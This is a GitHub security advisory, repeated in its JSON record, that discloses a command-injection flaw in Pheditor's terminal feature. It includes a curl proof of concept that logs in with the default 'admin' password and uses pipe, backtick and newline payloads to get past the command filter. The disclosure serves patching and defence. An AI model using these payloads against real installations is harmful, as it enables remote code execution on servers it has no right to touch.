GHSA-WG4W-WR5Q-6VJC

Vulnerability from github – Published: 2026-07-16 20:10 – Updated: 2026-07-16 20:10
VLAI
Summary
Pheditor: Incomplete command sanitization in terminal feature allows RCE via pipe operator, backtick substitution, and newline injection
Details

Summary

The terminal feature in Pheditor uses an incomplete character blocklist to sanitize user-supplied commands before passing them to shell_exec(). After the fix for GHSA-9643-6xjp-vx57 (which added $ to the blocklist), the characters | (single pipe), ` (backtick), and the newline byte (0x0A) remain unblocked. An authenticated user with the terminal permission (enabled by default) can leverage any of these to bypass the TERMINAL_COMMANDS allowlist and execute arbitrary OS commands as the web server user.

Details

Tested repository: https://github.com/pheditor/pheditor

Tested commit: e538f05b6faec99e5b23726bc9c17d6b57774297 (current HEAD on main)

Affected version: Pheditor 2.0.1+

The terminal handler receives $_POST['command'] and passes it to shell_exec() at pheditor.php:586:

$output = shell_exec((empty($dir) ? null : 'cd ' . escapeshellarg($dir) . ' && ') . $command . ' && echo \ ; pwd');

The blocklist at pheditor.php:557 checks for &, ;, ||, and $, but does not block |, `, or newline (0x0A):

if (strpos($command, '&') !== false || strpos($command, ';') !== false || strpos($command, '||') !== false || strpos($command, '$') !== false) {
    echo json_error("Illegal character(s) in command (& ; ||)\n");
    exit;
}

The TERMINAL_COMMANDS prefix check at pheditor.php:566-573 only validates that the command starts with an allowed name. All three bypasses start with a whitelisted command prefix.

Bypass 1 — Single pipe |: The filter checks for || but not single |. Payload ls | id passes both the blocklist and the whitelist (starts with ls). The shell executes: cd '<dir>' && ls | id && echo \ ; pwd, running id.

Bypass 2 — Backtick `: Backtick is not in the blocklist. Payload echo `id` passes the blocklist and whitelist (starts with echo). The shell executes id inside backtick substitution.

Bypass 3 — Newline 0x0A: A literal newline byte is not in the blocklist. Payload ls\ntouch /tmp/proof (where \n is 0x0A) passes both checks. Only the first line is validated against the whitelist. The second line runs as an independent command.

PoC

Environment: Any system running PHP 8.x with pheditor.php deployed and shell_exec() enabled.

Setup:

git clone https://github.com/pheditor/pheditor /tmp/pheditor-test
cd /tmp/pheditor-test
php -S localhost:8080 pheditor.php &

Authenticate (default password admin):

curl -s -c /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php -d "pheditor_password=admin" -L > /dev/null
TOKEN=$(curl -s -b /tmp/cookies.txt http://localhost:8080/pheditor.php | grep -o 'token = "[a-f0-9]*"' | grep -o '"[a-f0-9]*"' | tr -d '"')

Bypass 1 (pipe |):

curl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \
  --data-urlencode "action=terminal" \
  --data-urlencode "token=$TOKEN" \
  --data-urlencode "command=ls | id" \
  --data-urlencode "dir="

Expected: {"error":false,"message":"OK","result":"uid=... gid=...\n",...}id output proves RCE.

Bypass 2 (backtick):

curl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \
  --data-urlencode "action=terminal" \
  --data-urlencode "token=$TOKEN" \
  --data-urlencode 'command=echo `id`' \
  --data-urlencode "dir="

Expected: Same id output in response.

Bypass 3 (newline 0x0A):

curl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \
  --data-urlencode "action=terminal" \
  --data-urlencode "token=$TOKEN" \
  --data-urlencode $'command=ls\nid' \
  --data-urlencode "dir="

Expected: Same id output in response.

Control (blocked command without bypass):

curl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \
  --data-urlencode "action=terminal" \
  --data-urlencode "token=$TOKEN" \
  --data-urlencode "command=whoami" \
  --data-urlencode "dir="

Expected: {"error":true,"message":"Command not allowed..."} — allowlist enforced.

Cleanup:

kill %1; rm -rf /tmp/pheditor-test /tmp/cookies.txt

Impact

OS Command Injection (CWE-78). Any authenticated Pheditor user with the terminal permission (enabled by default) can bypass the TERMINAL_COMMANDS allowlist and execute arbitrary OS commands as the web server user. This is a bypass of the partial fix for GHSA-9643-6xjp-vx57 — that fix addressed $() substitution but three additional shell metacharacters remain unblocked.

Attacker privileges: Authenticated user (PR:L). Combined with default password admin, effectively PR:N.

Impact: Full read/write/execute access as the web server user. Confidentiality: High (read any accessible file). Integrity: High (write/delete files, deploy webshells). Availability: High (disrupt services).

Suggested remediation: Parse the command into executable + arguments, validate the executable against TERMINAL_COMMANDS with exact match, pass each argument through escapeshellarg(), or use proc_open() with an argument array to avoid shell interpretation entirely.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "pheditor/pheditor"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.1"
            },
            {
              "fixed": "2.0.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-55578"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-16T20:10:47Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nThe terminal feature in Pheditor uses an incomplete character blocklist to sanitize user-supplied commands before passing them to `shell_exec()`. After the fix for GHSA-9643-6xjp-vx57 (which added `$` to the blocklist), the characters `|` (single pipe), `` ` `` (backtick), and the newline byte (`0x0A`) remain unblocked. An authenticated user with the `terminal` permission (enabled by default) can leverage any of these to bypass the `TERMINAL_COMMANDS` allowlist and execute arbitrary OS commands as the web server user.\n\n### Details\n\nTested repository: https://github.com/pheditor/pheditor\n\nTested commit: `e538f05b6faec99e5b23726bc9c17d6b57774297` (current HEAD on `main`)\n\nAffected version: Pheditor 2.0.1+\n\nThe terminal handler receives `$_POST[\u0027command\u0027]` and passes it to `shell_exec()` at `pheditor.php:586`:\n\n```php\n$output = shell_exec((empty($dir) ? null : \u0027cd \u0027 . escapeshellarg($dir) . \u0027 \u0026\u0026 \u0027) . $command . \u0027 \u0026\u0026 echo \\ ; pwd\u0027);\n```\n\nThe blocklist at `pheditor.php:557` checks for `\u0026`, `;`, `||`, and `$`, but does not block `|`, `` ` ``, or newline (`0x0A`):\n\n```php\nif (strpos($command, \u0027\u0026\u0027) !== false || strpos($command, \u0027;\u0027) !== false || strpos($command, \u0027||\u0027) !== false || strpos($command, \u0027$\u0027) !== false) {\n    echo json_error(\"Illegal character(s) in command (\u0026 ; ||)\\n\");\n    exit;\n}\n```\n\nThe `TERMINAL_COMMANDS` prefix check at `pheditor.php:566-573` only validates that the command starts with an allowed name. All three bypasses start with a whitelisted command prefix.\n\n**Bypass 1 \u2014 Single pipe `|`:**\nThe filter checks for `||` but not single `|`. Payload `ls | id` passes both the blocklist and the whitelist (starts with `ls`). The shell executes: `cd \u0027\u003cdir\u003e\u0027 \u0026\u0026 ls | id \u0026\u0026 echo \\ ; pwd`, running `id`.\n\n**Bypass 2 \u2014 Backtick `` ` ``:**\nBacktick is not in the blocklist. Payload `` echo `id` `` passes the blocklist and whitelist (starts with `echo`). The shell executes `id` inside backtick substitution.\n\n**Bypass 3 \u2014 Newline `0x0A`:**\nA literal newline byte is not in the blocklist. Payload `ls\\ntouch /tmp/proof` (where `\\n` is 0x0A) passes both checks. Only the first line is validated against the whitelist. The second line runs as an independent command.\n\n### PoC\n\n**Environment:** Any system running PHP 8.x with pheditor.php deployed and `shell_exec()` enabled.\n\n**Setup:**\n```bash\ngit clone https://github.com/pheditor/pheditor /tmp/pheditor-test\ncd /tmp/pheditor-test\nphp -S localhost:8080 pheditor.php \u0026\n```\n\n**Authenticate** (default password `admin`):\n```bash\ncurl -s -c /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php -d \"pheditor_password=admin\" -L \u003e /dev/null\nTOKEN=$(curl -s -b /tmp/cookies.txt http://localhost:8080/pheditor.php | grep -o \u0027token = \"[a-f0-9]*\"\u0027 | grep -o \u0027\"[a-f0-9]*\"\u0027 | tr -d \u0027\"\u0027)\n```\n\n**Bypass 1 (pipe `|`):**\n```bash\ncurl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \\\n  --data-urlencode \"action=terminal\" \\\n  --data-urlencode \"token=$TOKEN\" \\\n  --data-urlencode \"command=ls | id\" \\\n  --data-urlencode \"dir=\"\n```\nExpected: `{\"error\":false,\"message\":\"OK\",\"result\":\"uid=... gid=...\\n\",...}` \u2014 `id` output proves RCE.\n\n**Bypass 2 (backtick):**\n```bash\ncurl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \\\n  --data-urlencode \"action=terminal\" \\\n  --data-urlencode \"token=$TOKEN\" \\\n  --data-urlencode \u0027command=echo `id`\u0027 \\\n  --data-urlencode \"dir=\"\n```\nExpected: Same `id` output in response.\n\n**Bypass 3 (newline 0x0A):**\n```bash\ncurl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \\\n  --data-urlencode \"action=terminal\" \\\n  --data-urlencode \"token=$TOKEN\" \\\n  --data-urlencode $\u0027command=ls\\nid\u0027 \\\n  --data-urlencode \"dir=\"\n```\nExpected: Same `id` output in response.\n\n**Control (blocked command without bypass):**\n```bash\ncurl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \\\n  --data-urlencode \"action=terminal\" \\\n  --data-urlencode \"token=$TOKEN\" \\\n  --data-urlencode \"command=whoami\" \\\n  --data-urlencode \"dir=\"\n```\nExpected: `{\"error\":true,\"message\":\"Command not allowed...\"}` \u2014 allowlist enforced.\n\n**Cleanup:**\n```bash\nkill %1; rm -rf /tmp/pheditor-test /tmp/cookies.txt\n```\n\n### Impact\n\nOS Command Injection (CWE-78). Any authenticated Pheditor user with the `terminal` permission (enabled by default) can bypass the `TERMINAL_COMMANDS` allowlist and execute arbitrary OS commands as the web server user. This is a bypass of the partial fix for GHSA-9643-6xjp-vx57 \u2014 that fix addressed `$()` substitution but three additional shell metacharacters remain unblocked.\n\n**Attacker privileges:** Authenticated user (PR:L). Combined with default password `admin`, effectively PR:N.\n\n**Impact:** Full read/write/execute access as the web server user. Confidentiality: High (read any accessible file). Integrity: High (write/delete files, deploy webshells). Availability: High (disrupt services).\n\n**Suggested remediation:** Parse the command into executable + arguments, validate the executable against `TERMINAL_COMMANDS` with exact match, pass each argument through `escapeshellarg()`, or use `proc_open()` with an argument array to avoid shell interpretation entirely.",
  "id": "GHSA-wg4w-wr5q-6vjc",
  "modified": "2026-07-16T20:10:47Z",
  "published": "2026-07-16T20:10:47Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pheditor/pheditor/security/advisories/GHSA-wg4w-wr5q-6vjc"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pheditor/pheditor"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pheditor/pheditor/releases/tag/2.0.6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Pheditor: Incomplete command sanitization in terminal feature allows RCE via pipe operator, backtick substitution, and newline injection"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…